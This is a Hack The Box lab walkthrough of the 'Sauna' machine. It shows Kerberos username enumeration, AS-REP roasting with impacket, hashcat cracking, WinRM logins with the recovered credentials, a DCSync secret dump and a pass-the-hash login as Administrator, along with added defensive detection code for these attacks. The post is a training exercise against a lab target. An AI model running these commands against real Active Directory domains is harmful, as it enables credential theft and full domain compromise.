Welcome to another of my HTB walkthroughs! I found Sauna to be a really onerous machine. I don't mean difficult, because difficulty is relative: what is complex for me can be simple for others. I'm at the beginning and still a newbie in this area, with much more to learn, but if you are here reading this tutorial we are probably in the same boat. Let's jump right in!

We start off with our usual nmap command:

nmap -p 1-65535 -T4 -A -v 10.10.10.175

I report only the list of open ports:

PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Supported Methods: GET HEAD OPTIONS
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-03-15 00:15:05Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap?
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  unknown
49673/tcp open  unknown
49675/tcp open  unknown
49686/tcp open  unknown
55454/tcp open  unknown

My first approach was to search exploit-db for the services found on the open ports. Nothing particular to highlight: lots of exploits, but I need a direction. There's a web portal on the server, running on IIS; this could be another attack point. Looking at it, I found on the about page some employees of the company (name and surname).

I start to have an idea, confirmed after reading the forum. These people may have an account on the machine; we just have to work out the username used for each one. We can prepare a list of usernames built with the standard rules usually used to create a domain account (name.surname, the first letter of the name followed by the full surname, and so on). I also put in the standard users (administrator, guest, etc.) and in the end my list had about 150 records.

At this point I start brute-forcing with the smb_login module in the Metasploit framework but, after many tries, I got nowhere. I tried different dictionaries, but nothing. I repeat the run, thinking I had missed some output in the console. Nothing. So I go and read the forum for tips, and I read the simplest sentence, one that made no sense at first but "turned on" the light; something like "nice hint in the picture". Looking at the picture you can read the number 88, so I understand that I have to concentrate on that port. But on port 88 there is a Kerberos service, so I proceed to identify a possible exploit for it.

msf5 > search kerbero

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank    Check  Description
   -  ----                                                 ---------------  ----    -----  -----------
   0  auxiliary/admin/kerberos/ms14_068_kerberos_checksum  2014-11-18       normal  No     MS14-068 Microsoft Kerberos Checksum Validation Vulnerability
   1  auxiliary/gather/get_user_spns                       2014-09-27       normal  No     Gather Ticket Granting Service (TGS) tickets for User Service Principal Names (SPN)
   2  auxiliary/gather/kerberos_enumusers                                   normal  No     Kerberos Domain User Enumeration
   3  auxiliary/scanner/winrm/winrm_login                                   normal  No     WinRM Login Utility
   4  post/windows/escalate/golden_ticket                                   normal  No     Windows Escalate Golden Ticket

Really good, five modules, and the third one attracts my attention: "enumeration". I don't waste any more time: I study this module and use it. During the execution everything works fine until the process arrives at the username "fsmith", which produces an error. I try again, but the process stops exactly at this user, so I truncated the list and continued with the enumeration. No other user produces an error. I understand that this is probably my attack point (it should be an error in the script that I have to correct, but let's go on for now).

msf5 > use auxiliary/gather/kerberos_enumusers
msf5 auxiliary(gather/kerberos_enumusers) > options 

Module options (auxiliary/gather/kerberos_enumusers):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DOMAIN                      yes       The Domain Eg: demo.local
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      88               yes       The target port
   Timeout    10               yes       The TCP timeout to establish connection and read data
   USER_FILE                   yes       Files containing usernames, one per line

msf5 auxiliary(gather/kerberos_enumusers) > set domain .
domain => .
msf5 auxiliary(gather/kerberos_enumusers) > set rhosts 10.10.10.175
rhosts => 10.10.10.175
msf5 auxiliary(gather/kerberos_enumusers) > set user_file work-on-this.txt
user_file => work-on-this.txt
msf5 auxiliary(gather/kerberos_enumusers) > 


[...]
[*] Using domain: EGOTISTICALBANK...
[*] 10.10.10.175:88 - Testing User: "fsmith"...
[-] Auxiliary failed: NoMethodError undefined method `error_code' for #<Rex::Proto::Kerberos::Model::KdcResponse:0x000055a3a6e83b00>
[-] Call stack:
[-]   /usr/share/metasploit-framework/modules/auxiliary/gather/kerberos_enumusers.rb:74:in `block in run'
[-]   /usr/share/metasploit-framework/modules/auxiliary/gather/kerberos_enumusers.rb:65:in `each'
[-]   /usr/share/metasploit-framework/modules/auxiliary/gather/kerberos_enumusers.rb:65:in `run'
[*] Auxiliary module execution completed

Ok, I have an account and a DOMAIN name (you can see it at the start of the output), but I have to understand how to attack the Kerberos service. I search on Google for a little and finally I find this: https://www.tarlogic.com/en/blog/how-to-attack-kerberos/. Good, my next tool will be impacket.

in7rud3r@kali:~/Dropbox/hackthebox/_Sauna - 10.10.10.175/attack/impacket/examples$ sudo python3 GetNPUsers.py EGOTISTICALBANK/fsmith -format hashcat -outputfile ../../fsmith.hash -dc-ip 10.10.10.175
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

Password:
[*] Cannot authenticate fsmith, getting its TGT
$krb5asrep$23$fsmith@EGOTISTICALBANK:d2c96f571f61f3bd4a076921c435cf32$c9b239a5aa12b5bb81981651f87cb3f9837d20a713167932f90d5213cb07528fb714cff2189f57496b3fc695c070a719632816abfd0eede593dce8f9d1d1fe41debd87a2bef58337429c6a681f1f08163c74499ffba1d12e6ffa91418f0107ca047b795926473b49f02c530f5bcd2804438b45fc8dbc9ff67c3a5eaed8dd9bcf3011ba7c79212810ae4abc43a0643cf3cae58967b6e0f61ac4d690020b42a039f1f234d2e61e627876fbc1b51a280ffdeea9a10665af99dae5e094d1d96894a60f63bb634e3cdcb2eadf471e09a74c2005a4a4cac0c3131fac78938f51eb16b699bb335a0a1225c3226664574e2c40b6596ad5abc8a27de7ee

I used the command in the first way I found; it asks me for the user's password, and when I press Enter without a password the tool fetches the AS-REP hash anyway. To be precise, the command can be launched with the -request parameter and it immediately takes what you need.
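What makes fsmith the foothold is that Kerberos pre-authentication is disabled on that account: the KDC answers an AS-REQ with a full AS-REP instead of a KRB-ERROR (which is also why kerberos_enumusers crashed on that name, calling `error_code` on a KdcResponse), and GetNPUsers.py saves that reply because its encrypted part is keyed from the user's password. The checks below are an added example, not the post's or impacket's code, showing what a defender would look for: the userAccountControl flag, the shape of the leaked line, and the 4768 event pattern; the event records and the 10.10.14.2 client address are constructed.

```python
"""Defender-side checks for the two Kerberos signals in this walkthrough: the
username list replayed against port 88, and the AS-REP the KDC handed out for
fsmith with no pre-authentication.  Added example; the event records below are
constructed, shaped like the fields of Windows Security event 4768."""
from collections import defaultdict

UF_DONT_REQUIRE_PREAUTH = 0x400000   # userAccountControl: "Do not require Kerberos preauthentication"
KDC_ERR_C_PRINCIPAL_UNKNOWN = "0x6"  # 4768 Status when the requested name does not exist


def accounts_without_preauth(users):
    """users: (sAMAccountName, userAccountControl) pairs read from AD.
    Returns the accounts whose AS-REP anyone can request, i.e. roasting targets."""
    return sorted(name for name, uac in users if uac & UF_DONT_REQUIRE_PREAUTH)


def parse_asrep_hash(line):
    """Split a hashcat '$krb5asrep$<etype>$<user>@<realm>:<checksum>$<enc>' line.
    Only principal, etype and ciphertext left the DC; the password is guessed
    offline, so the DC logs nothing while the hash is being cracked."""
    parts = line.strip().split("$")
    if len(parts) != 5 or parts[1] != "krb5asrep":
        raise ValueError("not a $krb5asrep$ line")
    principal, checksum = parts[3].split(":")
    user, realm = principal.split("@")
    return {"etype": int(parts[2]), "user": user, "realm": realm,
            "checksum": checksum, "enc_data": parts[4]}


def asrep_without_preauth(events):
    """Successful 4768 records whose AS-REQ carried no pre-auth data
    (PreAuthType 0): each is a crackable blob given to an unauthenticated
    client.  Etype 0x17 (RC4-HMAC) is the cheap case hashcat mode 18200 cracks."""
    return [(e["TargetUserName"], e["IpAddress"], e["TicketEncryptionType"])
            for e in events
            if e["EventID"] == 4768 and e["Status"] == "0x0" and e["PreAuthType"] == 0]


def enumeration_sources(events, min_names=5):
    """Client addresses that requested TGTs for many names that do not exist:
    the footprint of a generated username list like the one used here."""
    names = defaultdict(set)
    for e in events:
        if e["EventID"] == 4768 and e["Status"] == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            names[e["IpAddress"]].add(e["TargetUserName"])
    return {ip: len(n) for ip, n in names.items() if len(n) >= min_names}


def _ev(user, ip, status, preauth, etype):
    return {"EventID": 4768, "TargetUserName": user, "IpAddress": ip,
            "Status": status, "PreAuthType": preauth, "TicketEncryptionType": etype}


# Constructed sample; 10.10.14.2 is an invented client address.  Failed requests
# carry no pre-auth type and etype 0xFFFFFFFF, mirroring how the real event renders them.
SAMPLE_4768 = [
    _ev("smith.f", "10.10.14.2", "0x6", None, 0xFFFFFFFF),    # guessed names that miss
    _ev("f.smith", "10.10.14.2", "0x6", None, 0xFFFFFFFF),
    _ev("smithf", "10.10.14.2", "0x6", None, 0xFFFFFFFF),
    _ev("fsmith", "10.10.14.2", "0x0", 0, 0x17),              # the roastable AS-REP
    _ev("svc_loanmgr", "10.10.10.175", "0x0", 2, 0x12),       # normal pre-authenticated logon
]
# Constructed line in the post's format; checksum and ciphertext are placeholders.
SAMPLE_HASH = "$krb5asrep$23$fsmith@EGOTISTICALBANK:" + "0f" * 16 + "$" + "c9b2" * 8

if __name__ == "__main__":
    print(accounts_without_preauth([("fsmith", 0x410200), ("hsmith", 0x10200)]))
    print(parse_asrep_hash(SAMPLE_HASH)["user"], asrep_without_preauth(SAMPLE_4768))
    print(enumeration_sources(SAMPLE_4768, min_names=3))
```

The fix on the AD side is clearing the flag on accounts that do not need it, and the same detection logic can be fed from real 4768 events (for example via Get-WinEvent) instead of the constructed list.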

Moving forward, there are two different tools you can use to crack a hash, John the Ripper or hashcat; I prefer the second one.

in7rud3r@kali:~/Dropbox/hackthebox/_Sauna - 10.10.10.175/attack$ hashcat -m 18200 --force -a 0 fsmith.hash /usr/share/wordlists/rockyou.txt 
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM)2 Duo CPU     T8300  @ 2.40GHz, 1024/2900 MB allocatable, 2MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=18200 -D _unroll'
* Device #1: Kernel m18200_a0-pure.e76a9994.kernel not found in cache! Building may take a while...
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s

$krb5asrep$23$fsmith@EGOTISTICALBANK:25834f0ffe3b173de8636f4cbb2874ed$20fa322b00d05c32855ea95415e62e5c722def4c3c43f0bc7812b5785655c1d039ceb1cd753acb618ae27bcb6e35179f6d8e43e8806a6504245659728984395308b176ee9cff499c07ee378feef8b5225ea2212e5578096efbc64a542c44493b602f4b159283fed9206a3c0871b84926b4a039217239db4d5ce3efacc9b179150b736a724839e1e5726304ad500cf9287c350cb555e545342c9fd5fedc1436c65f5ab122c44ef0a80b260099e14caa771d48b131adffa03073a1ac21c1a97891cb4f6fa70977d8175cd80cf093518dfc2b2fa7703a2d4436b0eea7899525556267e0571d2b4656b372bbee9ea0e7cd3d5b900f65aed45010d1:Thestrokes23
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 AS-REP etype 23
Hash.Target......: $krb5asrep$23$fsmith@EGOTISTICALBANK:25834f0ffe3b17...5010d1
Time.Started.....: Sat Mar 21 14:21:32 2020 (1 min, 28 secs)
Time.Estimated...: Sat Mar 21 14:23:00 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   120.9 kH/s (10.32ms) @ Accel:32 Loops:1 Thr:64 Vec:4
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 10539008/14344385 (73.47%)
Rejected.........: 0/10539008 (0.00%)
Restore.Point....: 10534912/14344385 (73.44%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: Tioncurtis23 -> Thelittlemermaid

Started: Sat Mar 21 14:21:10 2020
Stopped: Sat Mar 21 14:23:01 2020


The number 18200 I use in the command is the hash mode matching this hash type, identified from the table on this page: https://hashcat.net/wiki/doku.php?id=example_hashes.

Ok, I have a username, a password and a Windows machine... Evil-WinRM.

in7rud3r@kali:~/Dropbox/hackthebox/_Sauna - 10.10.10.175/attack$ sudo docker run --rm -ti --name evil-winrm -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 10.10.10.175 -u EGOTISTICALBANK\\fsmith -p 'Thestrokes23' -s '/ps1_scripts/' -e '/exe_files/'

Evil-WinRM shell v2.1

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\FSmith\Documents> 

*Evil-WinRM* PS C:\Users\FSmith\Documents> pwd

Path
----
C:\Users\FSmith\Documents



*Evil-WinRM* PS C:\Users\FSmith\Documents> ls ..


    Directory: C:\Users\FSmith


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        1/23/2020  10:01 AM                Desktop
d-r---        3/21/2020   1:49 PM                Documents
d-r---        9/15/2018  12:19 AM                Downloads
d-r---        9/15/2018  12:19 AM                Favorites
d-r---        9/15/2018  12:19 AM                Links
d-r---        9/15/2018  12:19 AM                Music
d-r---        3/21/2020   1:17 PM                Pictures
d-----        9/15/2018  12:19 AM                Saved Games
d-r---        9/15/2018  12:19 AM                Videos


*Evil-WinRM* PS C:\Users\FSmith\Documents> ls ../Desktop


    Directory: C:\Users\FSmith\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        1/23/2020  10:03 AM             34 user.txt


*Evil-WinRM* PS C:\Users\FSmith\Documents> type ../Desktop/user.txt
1******************************f


And the first flag is mine! After this, I lose a huge amount of time understanding what I have to do. I navigated through the folders searching for some information left unsecured, executed the whoami command, searched hidden folders, tried to execute commands on the machine, exported the SYSTEM hive from the HKLM registry to try to attack the ntds.dit file, and so on, but nothing. I have to go back to the forum (yeah, I know, I'm a bit lazy) and I find a useful tip, a comment that mentioned the tool w**PEAS... We are working on a Windows machine, so it's not so hard to understand that the full name of the tool is probably winPEAS (https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite). I'm right. So again, I proceed to study the tool and run it.

Well, I download the tool and upload it to the remote machine through the related Evil-WinRM command. The tool took a long time to extract the information from the machine. I was impressed by the amount of information it managed to extract, and it took me a long time to read the whole report, but in the end I found something interesting.

[...]
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] Files an registry that may contain credentials <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] Searching specific files that may contains credentias.
  [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files
Looking inside HKCU\Software\ORL\WinVNC3\Password
Looking inside HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4/password
Looking inside HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon
    DefaultDomainName    REG_SZ    EGOTISTICALBANK
    DefaultUserName    REG_SZ    EGOTISTICALBANK\svc_loanmanager
    DefaultPassword    REG_SZ    Moneymakestheworldgoround!
Looking inside HKLM\SYSTEM\CurrentControlSet\Services\SNMP
[...]


This account could be used by some autostart service or to log into the machine automatically, but that's not important; what is important is that I have another password. But there's something strange: the user is not the one I found in the Users folder of the machine.

*Evil-WinRM* PS C:\Users\FSmith\Documents> ls ../..


    Directory: C:\Users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        1/25/2020   1:05 PM                Administrator
d-----        1/23/2020   9:52 AM                FSmith
d-r---        1/22/2020   9:32 PM                Public
d-----        1/24/2020   4:05 PM                svc_loanmgr


Anyway, I have to try it to understand whether it is a valid password or not.

in7rud3r@kali:/home/foo/data$ sudo docker run --rm -ti --name evil-winrm-2 -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 10.10.10.175 -u EGOTISTICALBANK\\svc_loanmanager -p 'Moneymakestheworldgoround!' -s '/ps1_scripts/' -e '/exe_files/'
[sudo] password for in7rud3r: 
Swipe your right index finger across the fingerprint reader

Evil-WinRM shell v2.1

Info: Establishing connection to remote endpoint

Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

Error: Exiting with code 1


As I supposed. So I try the user I think is the real one.

in7rud3r@kali:/home/foo/data$ sudo docker run --rm -ti --name evil-winrm-2 -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 10.10.10.175 -u EGOTISTICALBANK\\svc_loanmgr -p 'Moneymakestheworldgoround!' -s '/ps1_scripts/' -e '/exe_files/'

Evil-WinRM shell v2.1

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> 


Great, but I'm not the administrator. So again I spend a lot of time understanding what I need to do to go on and complete the machine. This time the forum doesn't help me (but I was concentrating on the wrong post). Someone suggested using the BloodHound tool to investigate the machine's entities; from the official GitHub page: "BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment".

I download it, install it, use it, upload a file to export information from the remote machine, import it into the tool and dig into the graph of the machine, searching for useful information. I found something interesting for sure; it is an alternative to the final solution I adopted to take the second flag, but in my case what I found didn't work for me. I don't know if the exploit this tool suggested to me (mimikatz) was the correct one. I tried to use it in every way, but it stops with errors (something related to the PowerShell session I was connected to, I suppose), so I have to find another way. The forum suggests two simple words that drive me to the right decision: secret and dump. I identify secretsdump.py, another tool of the impacket kit.

in7rud3r@kali:~/Dropbox/hackthebox/_Sauna - 10.10.10.175/attack/impacket/examples$ sudo python secretsdump.py EGOTISTICALBANK/svc_loanmgr:"Moneymakestheworldgoround!"@10.10.10.175
Impacket v0.9.21.dev1+20200313.160519.0056b61c - Copyright 2020 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:8914a5faf0ea6625c5793685b8055117:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:83a8b70cc5c7c52c671dffc79a6adce3f51146b482011f6638ce8b79088823ab
SAUNA$:aes128-cts-hmac-sha1-96:e54efb10e8049b98e008163080244446
SAUNA$:des-cbc-md5:6837e9a2ea0852bc
[*] Cleaning up... 
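The "RemoteOperations failed ... rpc_s_access_denied" line is secretsdump's attempt to use the remote registry (which needs local admin on the DC) being refused; it then falls back to DRSUAPI, which asks the DC to replicate the NTDS secrets exactly as another domain controller would (DCSync), and the DC complies because svc_loanmgr holds the replication rights on the domain object, which is the relationship BloodHound surfaces. What follows is an added example, not the post's or impacket's code: detection over constructed 4662 records and an audit of the domain object's ACEs; the right GUIDs are the well-known ones, the event records and ACEs are made up.

```python
"""Detection and ACL audit for the replication path secretsdump took above:
DRSUAPI is the protocol domain controllers use to replicate, so a principal
holding the replication control-access rights on the domain object can pull
every NTDS secret without touching the DC's disk.  Added example; the 4662
records and ACEs are constructed samples."""
import re

GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)
DOMAIN_DNS_CLASS = "19195a5b-6da0-11d0-afd3-00c04fd930c9"  # schema GUID of domainDNS
GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
GET_CHANGES_FILTERED = "89e95b76-444d-4c62-991a-0facbeda640c"
REPLICATION_RIGHTS = {  # extended-right GUIDs as they appear in ACEs and in 4662 Properties
    GET_CHANGES: "DS-Replication-Get-Changes",
    GET_CHANGES_ALL: "DS-Replication-Get-Changes-All",
    GET_CHANGES_FILTERED: "DS-Replication-Get-Changes-In-Filtered-Set",
}

def replication_rights_in(properties):
    """Names of the replication rights among the GUIDs of a 4662 Properties field."""
    found = {REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(properties)
             if g.lower() in REPLICATION_RIGHTS}
    return sorted(found)

def dcsync_events(events, allowed):
    """4662 records in which a principal outside `allowed` (DC computer
    accounts plus any sanctioned sync account) exercised a replication right on
    a domainDNS object.  A hit from a user account is a credential dump."""
    hits = []
    for e in events:
        if e["EventID"] != 4662 or DOMAIN_DNS_CLASS not in e["ObjectType"].lower():
            continue
        rights = replication_rights_in(e["Properties"])
        if rights and e["SubjectUserName"] not in allowed:
            hits.append((e["SubjectDomainName"] + "\\" + e["SubjectUserName"], rights))
    return hits

def nondefault_replication_grants(aces, allowed):
    """aces: (trustee, objectType GUID, is_allow) from the domain object's ACL.
    Returns trustees outside `allowed` that may replicate: the grant BloodHound
    shows as GetChanges/GetChangesAll, and the thing to remove in remediation."""
    grants = {}
    for trustee, guid, is_allow in aces:
        right = REPLICATION_RIGHTS.get(guid.lower())
        if is_allow and right and trustee not in allowed:
            grants.setdefault(trustee, set()).add(right)
    return {t: sorted(r) for t, r in grants.items()}

def _ev(user, guids):
    """Constructed 4662 record (%%7688 is the label that renders as Control Access)."""
    return {"EventID": 4662, "SubjectDomainName": "EGOTISTICALBANK",
            "SubjectUserName": user, "AccessMask": "0x100",
            "ObjectType": "%{" + DOMAIN_DNS_CLASS + "}",
            "Properties": "%%7688 " + " ".join("{" + g + "}" for g in guids)}

SAMPLE_4662 = [
    _ev("SAUNA$", [GET_CHANGES, GET_CHANGES_ALL]),       # the DC itself replicating
    _ev("svc_loanmgr", [GET_CHANGES, GET_CHANGES_ALL]),  # what the secretsdump run leaves behind
    _ev("FSmith", [DOMAIN_DNS_CLASS]),                   # ordinary access, no replication right
]
SAMPLE_ACES = [
    ("EGOTISTICALBANK\\Domain Controllers", GET_CHANGES, True),
    ("EGOTISTICALBANK\\svc_loanmgr", GET_CHANGES, True),
    ("EGOTISTICALBANK\\svc_loanmgr", GET_CHANGES_ALL, True),
    ("EGOTISTICALBANK\\FSmith", GET_CHANGES, False),     # a deny ACE is not a grant
]

if __name__ == "__main__":
    print(dcsync_events(SAMPLE_4662, {"SAUNA$"}), nondefault_replication_grants(SAMPLE_ACES, set()))
```

Auditing 4662 for these GUIDs requires the "Directory Service Access" subcategory to be enabled on the DCs; without it the replication request leaves no event at all.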


More hashes to crack. We already used hashcat above, so I go back to the table of hash modes to identify the right one and proceed (#1000).

in7rud3r@kali:~/Dropbox/hackthebox/_Sauna - 10.10.10.175/attack$ hashcat -m 1000 -a 0 --force admin.hash /usr/share/wordlists/rockyou.txt 
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM)2 Duo CPU     T8300  @ 2.40GHz, 1024/2900 MB allocatable, 2MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=3 -D DGST_R2=2 -D DGST_R3=1 -D DGST_ELEM=4 -D KERN_TYPE=1000 -D _unroll'
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Approaching final keyspace - workload adjusted.  

Session..........: hashcat                       
Status...........: Exhausted
Hash.Type........: NTLM
Hash.Target......: d9485863c1e9e05851aa40cbb4ab9dff
Time.Started.....: Sun Mar 22 18:23:29 2020 (15 secs)
Time.Estimated...: Sun Mar 22 18:23:44 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1030.5 kH/s (0.73ms) @ Accel:1024 Loops:1 Thr:1 Vec:4
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: $HEX[206b72697374656e616e6e65] -> $HEX[042a0337c2a156616d6f732103]

Started: Sun Mar 22 18:23:26 2020
Stopped: Sun Mar 22 18:23:45 2020


What? An unexpected surprise! Now what? I could try other dictionaries, but then I think it would be nice if I could use the hash directly to connect to the machine, so a quick check of the Evil-WinRM tool and... fantastic, I can!

in7rud3r@kali:~/Dropbox/hackthebox/_Sauna - 10.10.10.175$ sudo docker run --rm -ti --name evil-winrm-2 -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 10.10.10.175 -u EGOTISTICALBANK\\Administrator -H d9485863c1e9e05851aa40cbb4ab9dff -s '/ps1_scripts/' -e '/exe_files/'
[sudo] password for in7rud3r: 
Swipe your right index finger across the fingerprint reader

Evil-WinRM shell v2.1

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> 

---------------------------------------------------------

*Evil-WinRM* PS C:\Users\Administrator\Documents> more ../Desktop/root.txt
f******************************f

That's the last flag! But let me say that this was a really complex machine for me this time, a real sauna!

The awesome image used in this article was created by Adam Makowczenko.